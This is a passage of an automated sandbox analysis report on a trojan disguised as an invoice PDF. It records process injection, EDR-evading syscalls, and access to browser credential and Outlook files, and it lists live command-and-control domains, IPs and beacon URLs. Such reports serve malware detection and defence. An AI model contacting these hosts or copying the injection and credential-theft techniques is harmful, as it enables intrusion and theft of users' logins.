                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeThread register set: target process: 7864Jump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BD9008Jump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"Jump to behavior
                Source: C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: fQbMdgFgKkVEm.exe, 00000004.00000002.4502564623.00000000010F1000.00000002.00000001.00040000.00000000.sdmp, fQbMdgFgKkVEm.exe, 00000004.00000000.2275148397.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2031582166.0000000002E51000.00000004.00000020.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000002.2042554128.0000000002E7E000.00000004.00000020.00020000.00000000.sdmp, Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, 00000000.00000003.2032492519.0000000002E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: WIN_XP
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: WIN_XPe
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: WIN_VISTA
                Source: Outstanding Invoices Spreadsheet Scan 00495_PDF.exeBinary or memory string: WIN_7

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
                Source: C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets251
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572490 Sample: Outstanding Invoices Spread... Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 31 www.premium303max.rest 2->31 33 www.newhopetoday.app 2->33 35 18 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Antivirus detection for URL or domain 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 7 other signatures 2->45 10 Outstanding Invoices Spreadsheet Scan 00495_PDF.exe 2 2->10         started        signatures3 process4 signatures5 55 Writes to foreign memory regions 10->55 57 Maps a DLL or memory area into another process 10->57 13 svchost.exe 10->13         started        process6 signatures7 59 Maps a DLL or memory area into another process 13->59 16 fQbMdgFgKkVEm.exe 13->16 injected process8 dnsIp9 25 www.eco-tops.website 203.161.49.193, 49833, 49839, 49845 VNPT-AS-VNVNPTCorpVN Malaysia 16->25 27 www.newhopetoday.app 216.40.34.41, 49911, 49917, 49923 TUCOWSCA Canada 16->27 29 9 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 xwizard.exe 13 16->20         started        signatures10 process11 signatures12 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Modifies the context of a thread in another process (thread injection) 20->51 53 2 other signatures 20->53 23 firefox.exe 20->23         started        process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Outstanding Invoices Spreadsheet Scan 00495_PDF.exe39%ReversingLabsWin32.Trojan.Swotter
                Outstanding Invoices Spreadsheet Scan 00495_PDF.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://www.hover.com/transfer_in?source=parked0%Avira URL Cloudsafe
                https://www.hover.com/renew?source=parked0%Avira URL Cloudsafe
                http://www.locuramagica.online/rls3/0%Avira URL Cloudsafe
                http://www.eco-tops.website/n54u/0%Avira URL Cloudsafe
                http://www.eco-tops.website/n54u/?UTJ0bhC=ulF5vHaDZay2YbeuiqBK2WYi+52Jh6JWqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2tti5seczbyW8/HcZoVhAsi6mpRcK6hsQ2VCyFx3Djg7K8V+w==&Pt=fDlHoNWP0RBd0%Avira URL Cloudsafe
                https://www.hover.com/domain_pricing?source=parked0%Avira URL Cloudsafe
                https://www.hover.com/privacy?source=parked0%Avira URL Cloudsafe
                http://www.bioart.buzz/uwg4/100%Avira URL Cloudmalware
                http://www.gucciqueen.shop/tgvj/?UTJ0bhC=JzeZZokphZySGFVIg3fW0H54lk8TDwrrWR2sEOIWidbOqUuKdhJmv9JQEF9O1RD5XyTbq6Omqzt9QHi6LTaoobUAF4YLNuHihjnBZMeTneWuYVNORWnArhJV2H75YPAzvg==&Pt=fDlHoNWP0RBd0%Avira URL Cloudsafe
                https://error.kangleweb.net/?code=404&vh=5944450%Avira URL Cloudsafe
                http://www.newhopetoday.app/f83s/0%Avira URL Cloudsafe
                http://www.premium303max.rest/p39a/0%Avira URL Cloudsafe
                http://www.dlion.net/zdtk/?UTJ0bhC=CZnbO61oB8I0t5jp9Yjra7+H6pVn9XqOl0/1mbdze6wgsABtqXuHlKk0QinpfTYx1CmGDnkfwpenOsZSDrrPpuKT49SBu0EMo/Pb2gUHZetqgGuH1mNT0tuZ4b1AatRTdQ==&Pt=fDlHoNWP0RBd0%Avira URL Cloudsafe
                https://www.hover.com/tos?source=parked0%Avira URL Cloudsafe
                http://www.regents.health/q97g/?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBd0%Avira URL Cloudsafe
                http://www.astrext.info/8u3q/0%Avira URL Cloudsafe
                https://www.hover.com/about?source=parked0%Avira URL Cloudsafe
                http://premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa00%Avira URL Cloudsafe
                http://www.gucciqueen.shop/tgvj/0%Avira URL Cloudsafe
                https://www.hover.com/email?source=parked0%Avira URL Cloudsafe
                http://www.06753.photo/4i55/?Pt=fDlHoNWP0RBd&UTJ0bhC=u0M432eX/xZzvajH7Zn4oj16d1M/QQvp1keQ4HSaLqVhf5mFg72lw0bKX+EdY5KNk4RXhc2Czo9qgjxQ7/1U7lrsyz5+vZkdL+U3wCm0CZUZdVO/eyd7jrB+924QONEljg==0%Avira URL Cloudsafe
                http://www.dlion.net/zdtk/0%Avira URL Cloudsafe
                http://www.binacamasala.com/gnm5/0%Avira URL Cloudsafe
                http://www.premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg==0%Avira URL Cloudsafe
                http://www.73613.shop/tizt/0%Avira URL Cloudsafe
                http://www.bioart.buzz/uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBd100%Avira URL Cloudmalware
                http://www.73613.shop/tizt/?UTJ0bhC=qmi+mqOOYFdY+IQEwG2FxqFWHTg0Nvqmcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxg8Ma1a6j66cDsm0o40uJcJz1cVDMGreiQH32Lp7znSrnRg==&Pt=fDlHoNWP0RBd0%Avira URL Cloudsafe
                https://www.hover.com/tools?source=parked0%Avira URL Cloudsafe
                http://www.06753.photo/4i55/0%Avira URL Cloudsafe
                https://help.hover.com/home?source=parked0%Avira URL Cloudsafe
                http://www.locuramagica.online0%Avira URL Cloudsafe
                https://www.hover.com/?source=parked0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.newhopetoday.app
                216.40.34.41
                truetrue
                  unknown
                  www.73613.shop
                  180.178.39.236
                  truetrue
                    unknown
                    binacamasala.com
                    3.33.130.190
                    truetrue
                      unknown
                      www.locuramagica.online
                      31.31.198.145
                      truetrue
                        unknown
                        gucciqueen.shop
                        178.79.184.196
                        truetrue
                          unknown
                          www.premium303max.rest
                          45.79.252.94
                          truetrue
                            unknown
                            dlion.net
                            46.38.243.234
                            truetrue
                              unknown
                              www.astrext.info
                              217.160.0.132
                              truetrue
                                unknown
                                regents.health
                                3.33.130.190
                                truetrue
                                  unknown
                                  www.eco-tops.website
                                  203.161.49.193
                                  truetrue
                                    unknown
                                    cn-hk2.rvh2.raincs.cn
                                    74.48.34.43
                                    truetrue
                                      unknown
                                      gtml.huksa.huhusddfnsuegcdn.com
                                      23.167.152.41
                                      truefalse
                                        high
                                        www.06753.photo
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.binacamasala.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.dlion.net
                                            unknown
                                            unknownfalse
                                              unknown
                                              www.bioart.buzz
                                              unknown
                                              unknownfalse
                                                unknown
                                                www.gucciqueen.shop
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  www.regents.health
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    www.mnpl.online
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.bioart.buzz/uwg4/true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.locuramagica.online/rls3/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.eco-tops.website/n54u/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.eco-tops.website/n54u/?UTJ0bhC=ulF5vHaDZay2YbeuiqBK2WYi+52Jh6JWqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2tti5seczbyW8/HcZoVhAsi6mpRcK6hsQ2VCyFx3Djg7K8V+w==&Pt=fDlHoNWP0RBdtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.gucciqueen.shop/tgvj/?UTJ0bhC=JzeZZokphZySGFVIg3fW0H54lk8TDwrrWR2sEOIWidbOqUuKdhJmv9JQEF9O1RD5XyTbq6Omqzt9QHi6LTaoobUAF4YLNuHihjnBZMeTneWuYVNORWnArhJV2H75YPAzvg==&Pt=fDlHoNWP0RBdtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.newhopetoday.app/f83s/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.astrext.info/8u3q/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.premium303max.rest/p39a/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.dlion.net/zdtk/?UTJ0bhC=CZnbO61oB8I0t5jp9Yjra7+H6pVn9XqOl0/1mbdze6wgsABtqXuHlKk0QinpfTYx1CmGDnkfwpenOsZSDrrPpuKT49SBu0EMo/Pb2gUHZetqgGuH1mNT0tuZ4b1AatRTdQ==&Pt=fDlHoNWP0RBdtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.gucciqueen.shop/tgvj/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.regents.health/q97g/?UTJ0bhC=KK21uW0xHvorSk2vqcKD6wcSSPO+hyXQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B9BwzLeItohU7wCU4mTfCSECcS++9DVG9zxqTCFVXtteVmg==&Pt=fDlHoNWP0RBdtrue
